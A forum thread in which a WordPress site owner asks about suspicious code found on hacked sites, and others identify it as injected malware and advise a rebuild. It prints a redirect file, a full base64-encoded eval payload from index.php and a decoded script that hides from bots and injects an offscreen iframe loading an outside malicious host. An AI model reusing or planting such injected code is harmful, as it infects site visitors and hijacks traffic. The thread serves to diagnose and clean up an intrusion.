Can someone tell me what this file is doing?

I know a bit of php, but not much.mostly just HTML and CSS. I have been having security issues with a number of my wordpress sites and have come across a few things that I am not used to seeing in a wordpress root.

I came across a file in one site called ‘indextools.php’ containing the code:

<html>
<head>
<meta http-equiv="refresh" content="0;URL=https://*********" />
</head>
<?php if (preg_match('/^Mozilla\\/.*?\\(compatible; MSIE (8|7|6|5)\\..*?\\)/', $_SERVER['HTTP_USER_AGENT'])) : ?>
<script type="text/javascript">
window.self.location.replace('https://*********');
</script>
<?php endif; ?>
<body>
</body>
</html>

The URLs, starred out, are both websites that do not belong to me. In fact, they are for an affiliate program (to a company that I work with), but the affiliate ID is not mine, nor do I have one with this company…

My question is, quite simply, what is the code doing and could it be working against me.

I would say ABSOLUTELY this is performing an undesirable operation. It is redirecting any/all traffic landing on this page to those other URLs.

I decoded this encrpted(base64) piece of code, which was at the top of index.php:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
	echo("<script type=\\"text/javascript\\">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\134w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\134b'+e(c)+'\\134\\142','\\147'),k[c]);return p;}('Q\\x20\\x39=P \\x53\\50)\\73\\71.R\\509\\x2EO\\x28\\51\\53\\61\\51\\73\\x6A\\50\\x4C.\\113\\46\\46d\\x2E\\164\\56N\\x28\\'\\\\M\\134\\x73\\\\T\\\\\\172\\x5C\\x38\\47)\\x3D\\75\\x2D\\61){d\\56\\610\\x28\\47\\x3Cj\\x5C\\x5A\\x5C\\x37\\\\\\x31\\x32\\\\\\141\\x5C\\611\\x5C\\162\\x3D\\134\\x65\\'+\\62.6\\50\\x32\\x2E\\65\\50\\51*\\63\\x2B\\63\\51+\\x27\\x5C\\x65\\\\\\x66\\x5C\\x59\\\\\\126\\134\\125\\134\\x76\\x5C8\\\\\\147\\'\\53\\62\\566\\50\\62\\565\\x28\\51*3\\53\\63\\x29+\\'\\\\\\x22\\x5C\\130\\134W\\134\\x43\\134\\x41\\134u\\x5C\\x42\\\\7\\\\u\\134\\x38\\x5C\\x22\\x30\\\\\\"\\134\\146\\\\\\142\\1344\\x5C\\x48\\\\\\67\\x5C\\x38\\x5C\\147\\134\\157\\134\\155\\\\I\\\\4\\\\\\141\\134\\155\\134\\x63\\134\\153\\x5C\\160\\\\\\x4A\\134b\\134\\104\\\\\\x45\\\\\\106\\\\\\x47\\x5C\\61\\154\\\\7\\134\\x31\\157\\x5Ck-\\47\\x2B2\\566\\x282\\x2E\\x35\\x28\\x29*\\63+\\x6C)+\\47\\x31\\156\\\\\\61\\161\\x5Cv\\\\\\x41\\x5Ch:\\134\\x31\\160\\x27+\\62\\x2E\\66\\502.5\\x28)\\52\\x33\\53l\\x29\\x2B\\x27\\1341k\\134\\145\\134\\146\\134b\\134\\156\\x5C1\\152\\\\w\\x5C1\\155\\x5C4\\1344\\134\\157:\\134\\x31\\x76/x\\\\\\x68\\134\\61\\x75\\134\\x71\\\\1\\x72\\\\\\61s\\\\\\61t\\x5C\\143\\\\\\x61\\\\\\x63\\\\4\\134\\162\\\\\\61\\151\\\\\\x61\\\\\\61\\67\\x2Fi\\x5C\\161\\134\\x31\\70\\134\\61\\71\\56\\\\h\\x5C1\\66?\\x5C\\x31\\x33\\\\\\x314\\x5C\\147\\x5C\\x31\\x35\\x3C\\\\1a\\134\\x31\\146\\x5C\\160\\x5C\\171\\x5C\\67\\\\\\61g\\'\\51\\x3B\\x64\\56\\164\\75\\47\\61h\\x5Cs\\134y\\134z\\\\w\\x27\\x2B\\62\\56\\x36\\x28\\62\\565\\x28\\51\\52\\61e\\x29\\53\\'; \\71\\134\\x31b\\\\\\x6E\\x5C1\\x63\\134\\142\\134\\x38\\x27\\x2B\\x39.\\x31\\x64\\x28)\\175',62,94,'\\174\\x7CMa\\164\\x68\\x7C\\61\\60\\60\\x7C164\\174\\x72\\141\\x6E\\144\\x6F\\x6D|\\x66\\154oo\\x72\\x7C1\\x34\\65\\174x3\\104|ex\\x70|\\x31\\x35\\61|1\\x363|\\61\\65\\66\\174\\x64\\x6Fc\\165me\\156\\x74|x\\x32\\x32\\174\\17020|\\642\\174\\61\\66\\60\\174|i\\146\\17472\\x7C2\\600\\x7C\\x31\\657\\174\\616\\62|\\x7870|\\x31\\x341\\174\\170\\66E\\174\\61\\x350\\x7C\\61\\x365\\x7C\\143\\x6F\\x6F\\153\\151\\x65\\x7Cx72|\\x787\\x34\\x7C\\675\\174\\x7C\\x31\\655\\x7C\\x78\\x374\\x64\\174\\170\\x36\\106\\x7C\\17064|\\x31\\x34\\x35\\142\\174\\61\\65\\67\\x6C\\x7C\\17075\\x7C\\x31\\664\\145\\x7C\\x78\\63\\102|\\x31\\67\\x31\\x6C\\1741\\66\\63\\151\\x7C\\x314\\x32\\x7C\\x63\\x6F\\157\\x6B\\x69eE\\x6E\\x61\\142\\x6Ce\\144\\x7Cn\\x61\\x76i\\147ator\\x7C1\\63\\x37\\137\\174\\x69\\156de\\x78\\117f\\x7Cge\\x74Dat\\145|\\x6Ee\\x77\\174v\\141r\\x7Cs\\x65t\\x44\\x61\\x74\\145\\174\\x44\\x61\\164e|\\170\\x36\\x44\\174x\\x36\\67h|\\170\\66\\x35\\x69\\x7C\\x31\\64\\61\\155\\174\\x78\\62\\60f\\x72\\174x\\x36\\x38\\174\\170\\672\\141\\155\\x7C\\167\\162\\151t\\x65|1\\64\\x34t|40\\x77\\174\\x78\\667\\x6F\\x7C751|\\67\\66\\x7C1\\x350\\x70\\174\\x78\\67\\x41|\\61\\x34\\x34\\x7C\\x31\\64\\65x\\174x\\x32\\106i\\x7C\\17069|\\x78\\66\\65\\174t\\x6F\\x55T\\x43S\\x74r\\x69\\x6E\\147\\x7C\\x399\\71999\\x39\\174x\\66\\x36\\x72\\174x3\\x45\\x7C__\\174\\x782E\\142\\174\\x786\\x33\\x7C\\x78\\x37\\60x\\174\\170\\x36\\x43|42\\x68\\174\\160\\x78|\\1706\\x36t|\\1702D|7\\x33|\\170\\x37\\67|\\61\\x36\\61\\x6E\\x7C\\x782E\\1741\\x361|\\x78\\x32\\x46'.split('\\174'),0,{}))=')."</script>");

Can anyone shed any light on what this is? I’ve never seen encrypted php in index.php of a wordpress site…

It’s not encryped…just encoded and obfuscated.

It’s malicious code that has been injected into your site–you’ve been hacked. I highly recommend restoring your site from a backup.

If your backups don’t go far enough back, I’d recommend taking note of your plugins and customizations, delete the wordpress files, and set it up again. There’s no telling where else the malicious code may reside. For a good measure, you should change all of your passwords (both in wordpress and the password for your host’s control panel). I’d also explore the database for anything looking malicious.

I was afraid of that. The problem is, theres about 50 sites that could be affected, 10 or so that I know for sure. On top of that, before I was hired, the people I work for used some skeevy Indians and I believe Russians, which, later on, they believed to have been stealing from them, but don’t know how. I’ve come across many strange things over a period of time, but theres simply too much to dig through thousands and thousands of lines of code. Think I’m just going to suggest a complete rebuild.

I wouldn’t suggest a rebuild, I would demand it…

I don’t think that’s really relevant. I’ve seen this type of code injection happen on insecure servers, poor permissions settings, and/or installations of wordpress that weren’t locked down. Because wordpress is widely used, it tends to be a target for hackers and script kiddies unless you secure your server and your installation of wordpress properly.

Follow up question:

Here is the full index.php file

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKCI8c2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj4iLmJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzWkNsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLV1JiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhIZzFRMXd4TmpjckozMDdZejB4TzMwN2QyaHBiR1VvWXkwdEtXbG1LR3RiWTEwcGNEMXdMbkpsY0d4aFkyVW9ibVYzSUZKbFowVjRjQ2duWEZ4aUp5dGxLR01wS3lkY1hHSW5MQ2RjTVRRM0p5a3NhMXRqWFNrN2NtVjBkWEp1SUhBN2ZTZ25UbHcwTUZ4NE16aGNOelZjTVRBeklGdzJNVng0TXpnb0tWdzNNemhjZURKRlhERXlNaWhjZURNNFhEVTJYREV6TUZ3MU1GeDRNamxjZURKQ1hIZ3pNbHg0TWpsY056TlhLRng0TlVGY05UWlpYRFEyWEhneU5tSmNOVFo2TGx4NE5UWW9YSGd5TjFOY01UTTBYREV4TTF3eE16UmNNVEkxWEZ4Y01USTBYRnhjZURjMVhIZzFRMXg0TXpkY2VESTNLVng0TTBROVhEVTFYSGd6TVZ4NE1qbDdYSGcyTWx3MU5seDRNekZjZURNd0tGeDRNamRjZURWRFhEWXhYSGd6TjF4Y01WdzJObHg0TlVOY2VEWXhYRnhjTVRRelhGeGNlRE01WEhnMVExdzJNMXg0TlVOY01UUTNYREV6TkZ3Mk1UbGNYRnd4TkRaY2VEVkRNVFZjWEZ4NE5qUmNlRE5FWEhnMVExdzBNbHg0TWpkY05UTXdYRFUyWEhnek5TZ3dYSGd5UlRZb1hEVXhYRFV5TkZ3MU0xeDRNelFwWEhneVFsdzBOMXd4TXpSY05ESmNlRFZETVZ4NE16SmNlRFZEWERFME5sd3hNelF4WERZeFhIZzFRMlJjZURWRGNseGNYRFkzWERFek5ITmNORGRjTlROY05qQmNOVFkxWEhneU9GdzJNRng0TWtVMlhIZ3lPRng0TWpsY2VESkJYSGd6TkZ3MU0xdzJORncxTVZ3MU0xeDRNamRjWEZ4NE1qSmNYRnd4TkRkY01UTTBYRFl4WERZMFhIZzFRMXd4TnpCY01UTTBYSGd6TVZ4NE16TmNNVE0wTTF4Y1hIZzFNVnhjWEhnME1Wd3hNelJjTVRReFhIZzFRMXd4TURSY2VEVkRZVnhjWEhnek4xeGNYREUxTUZ4NE5VTmNlRFEzWEhnMVExdzBNbHg0TlVOY2VEUTRYSGcxUTBaY1hETmNOelZjWEZ3ME1sd3hNelJjZURjeFhERXpORnd4TURWY2VEVkRYSGcyUWx4NE5VTk5YRnhjTVRVMU9sd3hNelJjTVRRelhGeGNlRFV3WEZ4UFhIZzFRMXg0TkVGY01UTTBTVnhjWEhnMFExeDROVU5jZURjeU9seGNYRFl4WVZ3blhEVXpYRFl3WERVMk5WdzFNREJjZURKRk5sdzFNRncxTVZ4NE1rRmNlRE0wSzF4NE5rTXBLMXg0TWpkY2VETXhYREUzTWx4Y2Rsd3hNelIzWEhnMVExeDRNekZjTVRjeFhGeGNlRFkxWEhnelFWeDROVU5jZURNeFhERXdNbHduWERVek1DNWNOalZjTlRBd0xsdzJObHcxTUZ4NE1qbGNlREpCTkZ3MU0xd3hOVFJjTlRFclhIZ3lOMXg0TnpCY01UTTBYRFl4UVZ4Y1hERTFNRnd4TXpSY2VETXhYSGczT0Z4Y01YVmNNVE0wWEhnek4xeDROVU5jTVRZelhIZzFRMlJjZURWRE1WeDROelJjTnpKY2VEVkRYREUxTjF4Y2IxeGNYSGcwTVZ4Y1hEWXhYREUyTmx4NE5VTXhTVnd4TXpSY05qRmNNVEV3WEZ4Y05qRkhYSGd5UlZ4NE5rVmNYRnd4TnpGY1hGeDRNekZEWEZ3eFJseGNYSGd6TVZ4NE5EVmNYRGxjTVRNME0xeGNYRFl4UkZ3eE16UTVYRnhjZURNeGFGd3hNelJ0WERVMlhIZ3pNVnd4TkRkY1hGeDROekZjZURWRE1WeDROa0ZjTVRNMFhIZzJOVng0TlVOY2VEWXpYREV6TkZ3Mk1XbGNYRE5jTVRNME1Wd3hORFpjTVRNMFhERTFNVnhjWEhnek1Wd3hORE5jWEZ4NE16RmNlRFl5WEZ3eFhIZzJOVng0TlVOY2VEWkJYSGcxUTF4NE5qbGNlRFZEWEhnek1XUmNNVE0wWERZeGNWeDROVU14Y0Z3eE16UmNlRE14YzF4Y1hERTFNbHd4TXpSY0lsd3hNelJDWERFek5ERmNNVFl5WEhneVJseDROVU5yWEZ4Y05qRmNNVFUzWEhnMVExdzNNVnhjWERFMk5Gd3hNelJDWEhneU4xeDRNamxjTnpOY01UUXlMbnBjTnpWY0oxd3hNelF4WEhnMlExeGNkMXg0TlVOY01UWTFYRnhjTmpGY01UVXpYSGd5TjF3MU0xeDRNekJjTlRaY05qVW9YRFl3WEhneVJUWmNlREk0S1Z4NE1rRXhibHg0TWpsY05UTmNORGRjWEhaY2VEVkRYREUwTjF3eE16UmNOak5jWEZ3Mk1WeDROa1JjTVRNMFhERTBOVnd4TXpSY2VEWTJYRnhjZURjNFhERXpOSFJjWEhsY01UTTBYRFkzWEhneU4xdzFNMXczTUZ4NE1rVXhYSGczTnloY2VESTVmU2NzTmpJc01UQTNMQ2ROWEhnMk1WeDROelJjTVRVd1hIZzNRMXd4TnpSY2VEZERNVncyTkZ3Mk5YeGNOakZjZURNd01Gd3hOelJjZURZMlhIZzJRMjljZURaR1hIZzNNbHd4TnpSeVhIZzJNVzVrWERFMU4xeDROa1JjZURkRE4xeDRNelZjZURkRFhERTBOWGhjZURjd1hIZzNRMXg0TnpoY2VETTJYREV3TkZ4NE4wTmNlRE14TmpKOFpGeDROa1pjTVRRemRWeDROa1JsYmx3eE5qUjhYSGd6TVZ3Mk5ERjhlRFpjTnpCY01UYzBYSGczT0RkY05qQmNlRGREWEhnek1WeDRNelZjZURNeFhERTNORng0TXpSY2VETXdYREUzTkZ3Mk5GeDRNeko4WEhnek5seDRNemRjTVRjMFhIZ3pObHg0TXpWOFhERTNNRncyTmx4NE16bDhYSGd6TWpBd1hIZzNRMXg0TXpGY2VETTFObHg0TjBOOFhEWTFYRFkzZkh4Y05qRmNOall3ZkRFMlhIZ3pOSHg0WEhnek1seDRNekpjZURkRFhIZzNPRFpjTmpWY01UYzBYSGczT0Z3Mk5sdzJORnd4TnpSY01UY3dYRFl6UW54NFhIZ3pOMXcyTkh4Y2VEYzRYSGd6TjF3Mk1ueDROek5jZURkRFhIZzJNMjljZURaR1hERTFNMXd4TlRGY01UUTFYSGczUTF4NE56aGNOalpjTVRBMlhERTNORng0TXpkY2VETTJYREUzTkZ4NE5rVmNNVFExZDN4Y2VEYzRYRFkyWEhnek5HVmNNVGMwWERFM01EWkdYREUyTTF4NE4wTmNOakZjZURNM1hIZ3pNV3hjTVRjME5qQmNlRGREWEhnek5EQmNNVFl6ZEZ4NE4wTmNOamN6WEhnMlExeDROME5jZURNeFhEWTJYRFkxZEZ3eE5EVjhlRncyTlVaOFhIZzNPRFpjTmpWY01UUTJYSGczUTNoY05qZGNOalJjZURZNVhIZzJSbHg0TjBOY2VEYzJYSGcyTVZ4NE56SjhYSGczT0RjelhIZzJSbHg0TmtOY01UYzBYREUzTURZeVhIZzNRMXg0TXpGY05qUmNlRE15ZkhObFhIZzNORng0TkRSY01UUXhYREUyTkdWY2VEZERYM3hjTmpGY2VETTFYRFkxWERFMk5IeDROelZjZURkRFhERTFNVzVjTVRRMFhERTBOWGhjTVRFM1hIZzJObHg0TjBOY01UVXhYREUwTm54blpWeDROelJjZURRMFlYUmxYREUzTkZ4NE5qTmNNVFUzYjF3eE5UTmNNVFV4WlZ4NE5EVmNNVFUyWERFME1Wd3hOREpzWERFME5WeDROalI4WEhnMlJWeDROakYyYVZ4NE5qZGhYREUyTkZ4NE5rWnlmRnd4TmpkY01UWXlhVng0TnpSbFhIZzNRMXd4TnpBMlhEWTNmRng0TnpoY05qSmNOakJvWlZ3eE56UmNlRE14WERZMFhIZ3pNVnd4TlRWY01UYzBYREUzTUZ3Mk5sdzJObHd4TnpSY05qRmNlRE0wWERZMFhIZzNOSHd4TkZ4NE16WmNNVGMwZUZ3Mk0xd3hNRE5wWERFM05FUmhYREUyTkdWOFhEWXhYRFkyWERZM1hERTNOSGhjTmpKY2VEUTBYREUzTkZ3eE56QmNlRE16TVZ3eE56UjRYSGd6TTF3Mk5IdzJYRFkxWEhnek4xeDROME0yWEhnek0zeGNOamRjTmpWalhERTNORng0TnpCY01UVXdYSGczUTF4NE16RmNOalJjZURNeFhERTFNWHd4TkZ4NE16ZGNlRGREWEhnek4xeDRNemQ4ZUROY2VEUTBmRncyTVZ4NE16TmNlRE0zWERFek4zVnRYSGczUTF4NE16RTNNRng0TjBOY056RmNOekU1T1Z3M01WdzNNVng0TXpsY01UYzBYSGczT0RZMmNseDROakY4WEhnM09EWTFNRnd4TkRaOGVEWmNlRE15T0Z4NE4wTjRNME5jZURkRFhIZ3pNVFJjZURNelhERTNORncyTVRaY2VETTBYSGczTkZ4NE56QmNNVGMwWEhnek1WdzJOak55WTF4NE4wTXhYRFkxWEhnek0xeDROME5jTVRZMFhIZzJSbHg0TlRWVVhERXdNMU5jZURjMGNsd3hOVEZjTVRVMlhERTBOMXg0TjBONFhIZ3pNbHcyTUh4Y2VETXhYSGd6TlZ4NE16ZGNNVGMwWERFMk1GeDROemhjZURkRGVGeDRNemRjZURNNFhERTNORFZjZURNMVhIZzNRM2d6WEhnek1sd3hOelJjZURjNE1seDRORFpjZURkRGVGeDRNelpjZURNeFhIZzNRMXd4TnpCY05qSkZYREUxTmx4NE4wTmNOakUzWERZeGZGd3hOekEyWERFd01WeDROME14WERZMk1Gd3hOVEluTG5Od2JHbDBLQ2RjZURkREp5a3NNQ3g3ZlNrcCcpLiI8L3NjcmlwdD4iKTsNCn0='));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

Which as mentioned was encoded and obfuscated, comes out to be something like this:

<?php
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
	echo("<script type=\\"text/javascript\\">" 
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\x5C\\167+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','\\147'),k[c]);return p;}(
var exp = new Date();
exp.setDate(exp.getDate() + 1);
if (navigator.cookieEnabled && document.cookie.indexOf('__umtd=') == -1) {
        document.write('<iframe '
                + 'width="' + Math.floor(Math.random() * 100 + 100) + '" '
                + 'height="' + Math.floor(Math.random() * 100 + 100) + '" '
                + 'frameborder="0" '
                + 'style="position:absolute;'
                        + 'left:-' + Math.floor(Math.random() * 100 + 200) + 'px;'
                        + 'top:-' + Math.floor(Math.random() * 100 + 200) + 'px" '
                + 'src="http://xpqnwqn.ninth.biz/index.php?go=1"></iframe>');
        document.cookie = '__umtd=' + Math.floor(Math.random() * 9999999) + '; '
                + 'expires=' + exp.toUTCString()
}       ')."</script>");
}

If I removed the code from the index.php file yesterday, and it is already back today, what assumption(s) can I make about it? My thought is that I’m going to find it when I get into the database. Is there anything else I should check?

I also found this link which has the same code - though I do not know what it means.
https://gist.github.com/1377065

We have been hacked in exactly the same way. Have you had any success so far that you can share?

I ended up finding a single backdoor in a file called “google345ffe…” removed all malicious code from the sites affected and haven’t had problems since. Thank you all for your help!